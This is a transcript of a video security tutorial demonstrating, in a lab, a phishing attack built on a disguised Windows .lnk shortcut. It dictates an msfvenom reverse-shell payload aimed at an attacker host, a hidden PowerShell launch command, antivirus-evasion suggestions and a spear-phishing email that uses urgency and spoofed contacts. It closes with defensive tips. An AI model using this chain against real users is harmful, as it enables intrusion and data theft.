everyone. Rick here from Port Zero. So in today's video, we're going to explore a stealthy way that attackers deliver malware, and that's via Windows shortcut files, also known as .lnk files. These look harmless, but they can hide very powerful payloads or redirect you to a very powerful payload. So in real-world scenarios, an attacker might deliver an LNK file by various different ways. So a few of the ways that they could do it is through USB drive drops. So, you're walking through a parking lot and you see that USB on the ground. Some people might be, curious to pick it up, bring it inside, plug it in their computer and find out what's on it. Next thing you know, they're clicking on stuff that they shouldn't. So don't ever do that. Another one would be shared through shared folders or network drives. Something could be added on there and may not know and suspect it, and you're pulling from that file, and next thing you know, you're opening up something that executes that shouldn't. And that because it bypassed, did antivirus evasion techniques. So embedded links in chat groups, you never want to download anything that you don't know is from a creditable or reputable source onto your computer anyway. So, and then the last one we're going to do, and we're going to focus on another method is malicious zip attachments in phishing emails. And that's what we're focusing on in this episode. So some of the things we're going to use here today are going to be our Kali Linux attack machine. We're going to be utilizing our Port Zero domain, which is going to be our Windows 11 machine, used as a victim machine. And then some of the tools we're going to kind of highlight are msfvenom, our Metasploit framework with the MSF console, which we've used in previous videos. And then we're also going to show how we can create that LNK file or that shortcut file to be able to produce that retrieval command to be able to start a PowerShell process. So it's going to be a fun episode. And without further ado, let's get started. Okay, so let's get started. So kind of like we said in the intro, so today we're using the Kali VM and as our attack machine and our Windows 11 VM as our victim machine. So and also to go along with that, we're doing this, we're not using Metasploitable 2 today, like we did in the previous video. We're using our internal domain, which is going to be the Port Zero domain. So to be able to talk through all this. So just remember, this is for educational purposes only. Always want to get strict permission if you're going to do stuff like this in your environment or in somebody else's environment. So without further ado, let me orient you to the screen. So what we have here on our left side is we've got our Kali attack machine, which is our attacker. And then we also, on the right side, is we have our Windows 11 VM, which is going to be our victim. So what we're also going to show in this is the reason why I have them split screen is that way we can see what's going on both sides. Basically, one thing I love to say is we're trying to show how the sausage is made. So once again, this isn't for nefarious purposes. This is for strictly education. So what we're going to focus on today is a notional financial institution. And this is a targeted attack, spear phishing, basically. So what we're going to do is we're going to create a malicious payload. We're going to also, from our attacker side, now granted, everything that we do on the that we build on the victim side, and we're doing that for training purposes only. But what we're building, what I'm going to show you building on the victim side is wouldn't typically be done on the attacker side. So you're going to see some kind of unconventional stuff here. And when we build our payload, we need to transfer that over to the victim. And then we're going to show you how to create that link file, which is that shortcut, and then package that up in a zip file along with our malicious embedded executable. And then we're going to deliver that or simulate delivering that through a phishing campaign. We'll kind of show you an email that would be addressed to go along with that. And then once the victim clicks on or downloads a zip file, clicks on the instructions that we give them to be able to click on the open report, you're going to be able to see from the victim side and then what takes place on the attacker side. So a few of these tools you're going to recognize from the multi-handler. So we're going to be utilizing that again inside the Metasploit framework. And we're also going to set up our Python web server to be able to transfer those files. And then we're going to use PowerShell on the victim side to be able to invoke that web request, be able to pull that file so that way we can package everything together, see how it's all going to pan out in the long run. So without further ado, let's start here on our attacker machine. So what we want to do is we want to be able to create that payload. So we're going to do an msfvenom. And as you can see, we've got this already built out right here. So actually, let me go back so that way you can see. I know it's kind of grayed out, but we're going to type all this out. So our payload is going to be Windows. Oh, let's do msfvenom -p Windows interpreter reverse TCP, just like we did in our multi-handler video. Our listening host, which is going to be our attacker machine, equals 192.168. How about we do equals instead of a dash? 192.168.227.5. Our listening port equals 5555. And then our file we're going to create, since it is going to be going against a Windows machine. So once again, kind of going back to is we've already done our reconnaissance. We're in our weaponization phase in our cyber kill chain. So, and then we'll get into delivery and then post-exploitation. So right now we're in the weaponization phase. So we've already done our reconnaissance. So we know that this is the machine we're attacking is a Windows vulnerable machine. So we're doing an executable file. And we're going to output that to, or we're going to create that payload to go into what we're going to call report viewer.exe. Okay. So we're going to create that. We hit enter. Give us a second. Now, as we're building out this payload too, there's some obfuscation techniques that, depending on the type of, during your reconnaissance, you may have found out that maybe they're running some type of malware or some type of anti-malware, some type of antivirus. You might find out what type of EDR they're running in their system. However, so if we want to be able to try to doing some type of evasion technique, we can encode this by msfvenom-e and then whatever your encodable payload is going to be. We're in here, instead of us putting something nefarious like backdoor.exe, we're going to rename this payload to report_viewer. So it'll be blending in with something that could be, typically seen in their environment maybe. And then also we want to use tools like maybe Veil or Shelter or some other obfuscation framework to be able to further evade antivirus. So we've got our payload built. So what we want to do now is we want to come over to the victim side. And remember, what we're going to do on here right now is what would typically be done on the attacker side. But for this case, we're just going to kind of build it here. And I want to show you some little techniques as well too. So over here, we're going to hit right click. We're going to do new shortcut. Okay. So we get the prompt that comes up. So in this payload field or in the location of the item, this is where we're going to kind of type. This is where we're going to type our PowerShell command that once the user clicks on this link file, which is a shortcut file, it's going to redirect that file or set that file in motion and establish a PowerShell command. So we're going to run PowerShell, and then it's going to be a Windows style. Hidden command is going to be start process, and then it's going to be C users. And since we know who we're targeting in this. It's going to be, our victim is going to be B Bruins. B Bruins. And then report viewer.exe. Okay, so now we've got that PowerShell command, and it's pointing to the PowerShell to start process, and it's going to be starting the process of the report underscore viewer executable. So we're going to hit next. And what do we want to name the shortcut? So when we package all this up, we don't want to put it as PowerShell, or we don't want to put something as nefarious like backdoor, right? So we're going to name this here, we're going to name it open report. Okay, because once we craft this email to go with it, we're going to also give the victim some instructions on what to do. So, and one of the instructions when we get to the email, when I show you that, it's going to tell them to double click or just click on open report, which is now going to set that chain in motion. So we're going to go ahead and click finish. And you see what it did is it created a shortcut file on our screen called open report. However, since we started that off with PowerShell, it's going to default to PowerShell. However, what we want to do is on the victim side, it'd be kind of weird if we sent them a zip file and we told them, hey, click on this report and this shortcut, but yet the shortcut is the universal symbol of PowerShell. So it just kind of might get somebody to scratch their head, right? So we want to be able to change the icon on this. So these are .ico files. So what we want to do is right click on it, go to properties, and change icon down here at the bottom. So we want to change the icon. When we first pops up, we've got the default PowerShell as far as with the two PowerShell icons that are there. So let's browse, and there are other linked file type or linked ICO files inside, built inside Windows that we can utilize. That'll probably make more sense to the victim when they go to open it. So we're going to go to this PC, local disk. Let's go to Windows, and I'm going to scroll all the way down. And here you got this Explorer file. I'm going to open that. And as you can see, it's got all different type of .ico files or icons here. So we're going to use something that would make a little bit more sense to the user. Be like, oh yeah, look at that folder. They want me to click on the folder versus a PowerShell icon. So we're gonna click this right here, this folder with the little green arrow that looks like it's going to open up to something else. So click OK, hit apply, and OK. So now this is part one of our zip, what we need to be able to package up in our zip folder. So we've got our link file, .lnk file, that we want to be able to package up. Okay, so next thing we want to do, come back over to our attacker machine, and we're going to open up a new tab. And when we do that, we've got a working tab. So we already named that working. So that way we're not kind of getting everything wrapped around. So we're going to rename this session, since we're going to do this as our Python server. So set that as Python. And then what we're going to do is we're going to do a Python 3 -m http server and then 8080. This is so that way we can transfer our malicious payload back over to here. And once again, this is for training purposes. You wouldn't actually do this on a victim machine, because if you already had access to it, then why even do this? So we're going to already set this in motion right here and come back over to our victim machine. Oops. Let's open up a PowerShell prompt. Now, I have to give a disclaimer on all this. The disclaimer I've got to give here is this. So Windows, especially this being an 11, in order for me to be able to complete this scenario here, what I've had to do in the background is, one of the best antivirus that you're going to have in your Windows environment is already Windows Defender. However, when we when you try to create this with Windows Defender activated, it's not going to allow you to do anything because Windows Defender is actually doing its job, right? And then also I had to turn off the firewall for this because the default settings is not to accept any type of payloads coming in from 8080. So it wouldn't even come through when we were going through this. So once again, when you're doing your reconnaissance, when you're going through your cyber kill chain, is finding out all the different types of instances or the metadata within inside that target environment. So try to find out what type of antivirus they might have, what type of EDR systems they might have, and but once again, Windows Defender is really one of the better ones out there. But so kind of as a small disclaimer is I had to kind of shut these off to be able to get this tutorial going. So, so let's go ahead and we're going to do, we want to be able to pull that file that we created with the malicious payload back over. So we're going to do invoke web request with a URI 192.168.7.5. That's our attacker IP, port 8080. And then what we want here is the report viewer, report viewer.exe. And then we want to do an out file to report viewer.exe. Okay, so now we've got this on our left side, our attacker screen. We've got our web server set up. When we go to hit execute, as you can see, we've got a good 200 requests coming through. And if we want to just double check that it's over here, we can go to directory. Boom, there's report viewer. Already, it's pulled from the attacker machine over to here. But once again, this is just for us demonstrating it, building stuff on the victim machine. It would typically be built on the attacker machine. Okay, so we're going to go ahead and close this out. Okay, so once again, or now that we have that back over here, so we'll kind of move over. Let's open up our File Explorer. Users, Bruins. We got report viewer here, okay? So now if I'm on the attacker side, what I want to do is if I want to be able to package this up really nice, okay? So what we're going to do is create a new folder. And we're going to create that folder. And the folder, let's name it year end report. Okay. And in that folder, we're going to move the LNK file that we created. And then we're also let's move this here. There we go. All right, so with inside that year-end report, we've got our LNK file and we've got our executable, okay? So both of them are in there. Okay, so once again, so now what we want to do is right-click on this, compress to, zip file. And there we are. Here is this is what we're going to be sending our victim. Okay, this is going to be when we go to send them an email, which we're going to open up in here in a second. We're also going to send them the zip file. We're going to give them instructions. So here is a kind of email an attacker might use in the real world to trick somebody into launching the malicious shortcut. When the user opens the zip and double clicks open report, the payload's going to execute. So we kind of, so this is kind of like the email will generate something very similar or something similar to this. So we kind of created something that we may send. So the subject being final year review needed or final review needed, year-end financial report 2024. And we know we're targeting this gentleman right here, Mr. Bruins. So please find the attached finalized year-end financial report for 2024. We need your quick review and acknowledgement before our executive meeting tomorrow morning. So with inside that, we're kind of given that sense of urgency, which is one of those indicators you want to look out for in any type of phishing email. Simply click the Open Report file found inside the attached zip to preview the summary page. No edits are necessary as this is for read-only confirmation. So basically, we're not asking them to do anything with the file, but except just look at it. Let me know once you reviewed it, or reach out if the file doesn't open properly. That's also giving that option too, because what we know is that that file actually isn't going to open. All right. So, and we give a good salutations or, thanks. We put our name on there, and then we'll give an email. And that email is going to be a spoofed domain that's going to look just like the victim's domain, but there'll be something, it'll be something, you know, kind of similar to it, but it's not going to be. So that's going to be a lookalike domain. And then there's going to be a number. We don't want to give them a real help desk number, right? Because then they're going to be like, I don't know what you're talking about. And then next thing you know, you've got, tier 2 or somebody looking at it, your network IT, whoever is going to be looking at it for them. And you don't want that. So maybe give them a spoof number, something that's very similar, close, that's going to be, could be possibly look like a company internal number. So that way, if they do have a problem with it, they can either email or give that call and be like, hey, I need help. And next thing you know, now you've got a threat actor on the other end, kind of playing that nice guy, nice, bad cop, good cop type role, saying, oh, okay, yeah, here, let me help you, as somebody else is going through their machine and trying to extract whatever files they need to. So that's just kind of a similar email that we're looking at. So, all right, so we simulate the shortcut. In real world, the attacks could be delivered via USB drop in, public spaces, embedded zip files in archives and zip files, kind of like what we talked about here, shared through network drives and whatnot. So right here, so what we're going to do is we're going to come back over to our working. So before the user double clicks on that file, what we need to do is we need to be able to set up a Metasploit. Well, we need to get into Metasploit. So we're going to do an MSF console, and we'll use our dash Q kind of like we did on our other previous demo. Let this run. Should be getting an MSF6 prompt here in a second. There we go. So now what we want to do is use exploit multi-handler like we did in our previous video. All right, so we're going to set our payload, and we're going to do like we did before. We're going to set up a reverse TCP. So set payload, it's going to be a Windows, since we know we're attacking a Windows machine. Interpreter, so we can set up to get that good interpreter session going. And then reverse TCP. And then we need to set our L host and our L port. Set L host. It's going to be our attacker. 168. Oh, let's get that out of there. 168.227.5. Set L port 5555. And then we're going to do an exploit. All right, so as we can see, we started a reverse TCP handler here from our attacker, which is our 227.5 on port 5555. So now what we're going to do is we're going to come into the victim side. Oh, let me just leave this right here. We're going to come into our victim side, and now the victim received the email. Okay, so they're going to do the instructions, or hopefully complete the instructions of what the attacker sent, right? So now they downloaded the zip file, and then once they open up the zip file, they've got their year-end report file. And then what we're going to do is, once the victim double clicks on the open report, we've got, you see the PowerShell prompt came up, and then it went away. We can also set that, so we can kind of go back, and I'll show you something real quick. If you don't want that window to pop up, we can show you how to set that as well. So once we victim double click that, now we look over on our attacker machine, and we've got a interpreter session. So I'm going to move this over here. So now what we can see on the victim machine here is we've got contents of our desktop, right? So to kind of see where we're at. So once we have access to, or we have our interpreter session set up, one of the things we like to do is, let's see what our print working directory is. So right now it's got ourselves in PowerShell, right? But we want to CD change directory to C users. Run a directory, and then from here, once we get to our users, we can see we've got all kind of different users here. So what we can do is just start working through the directory. So I see a couple on here I'd really like to be able to look at. So we've got administrator, we've got PZ admin, we've got B Bruins, we've got another one, V Boxer. So kind of running down the list here. So let's do CD administrator. Access denied. We don't have access to that. So CD, let's go down next, PZ admin. We don't have access to that either. CD, B Bruins. Seems like we got access. So we'll do a directory. And as we can see, we've got access to B Bruins's account. So what we've got here is all different directories, just like you would find in any kind of Windows system. So let's go to desktop. So CD desktop, we'll do a directory. All right, so we've got the same things we're seeing on our victim machine. We've got a directory called account numbers, which is here. We've got email.txt, which is our file right here. We've got our end of year report, and we've got our zip file. So the thing that we already know that we've already sent, we've already got the email.txt, the year-end report, and .zip is what we've created. And for training purposes, we built those on the machine. So, but what's kind of sticking out to me is the account numbers. As a threat actor, I wouldn't mind finding that. So let's CD to account numbers directory. We got a file that's called stayout.txt. Let's check that one out. So we're going to go ahead and try and read that. So cat stay out.txt. Maybe we can find some good numbers in here. Oh, look at that. Did you really think I could keep sensitive information, or I would keep sensitive information in this file? So guess what? They put in a faux file on there called account numbers, so that way it might be enticing to, a nefarious threat actor. And inside of there was a text file that says stay out. Once again, kind of piques that curiosity, not only for victims, but also for threat actors as well. And then I go to open that, and we go to read the file, and it says, did you really think I would keep sensitive information in this file? So as you can see, what we did here is, hopefully you got something out of this. We created our path. We created a malicious payload to a file that doesn't really look that all nefarious. Plus, we had a method behind our madness. We know we're doing a spear phishing target. to our financial person over here. So we knew that report viewer, something that might stand out would be good. We created an email that told them, hey, look, we got our end of year report. I just need you to look at it. And here's some instructions for downloading the zip file. And this, once you download the zip file, this is what I need you to be able to click on. So we did that. And then we created that, that LNK file, which is the crux of what we're doing here is how to create that LNK file and be able to embed that PowerShell script to be able to open up that executable for this to work, for us to be able to run our Metasploit framework, get our interpreter session, and one way that threat actor can go ahead through this spear phishing campaign, gain access to that computer. So look for some more here in the future, but hopefully you got something good out of this. All right, so that was kind of a really fun episode. I really enjoyed kind of going through that. So LNK files, they are sneaky and they can be dangerous even without admin rights. So many users, they won't suspect a shortcut file, especially when it uses a legitimate icon, kind of like what we created here. So in this video. So this is why proper file type filtering, user awareness training, and endpoint monitoring are critical components of a strong security posture. So in future videos, we're going to look at more real world vectors and how attackers continue to evolve. One thing we want to add to these videos too, we're going to start adding, is some of the blue team detection and defense tips. So what can we do as a blue team to be able to help lessen or kind of mitigate some of this stuff? So what we can do is a few different things. We can block LNK attachments and email filters. We can disable script-based shortcut launches via GPO. We can use EDR tools and to detect suspicious PowerShell executions. And then we can monitor file creation in temp directories or download directories or folders. And then we can alert on .lnk file launches that execute PowerShell or exe payloads. If you have a really good EDR system, you know, especially like what we had here, we talked about Windows Defender. Typically that's going to be able to pick up on a lot of this stuff. So, but if you've got a really good proprietary EDR, they should be good at picking this stuff up. So once again, comment, like, share, anything that you liked about it, anything that you want to be able to see added to it, just comment in it. So that would be great, and it'd be huge for us. So that way we can produce a little bit more or a little bit better products for you. So, or if there's something specifically you'd like to see, please, by all means, comment on the video. So until next time, stay secure and stay vigilant.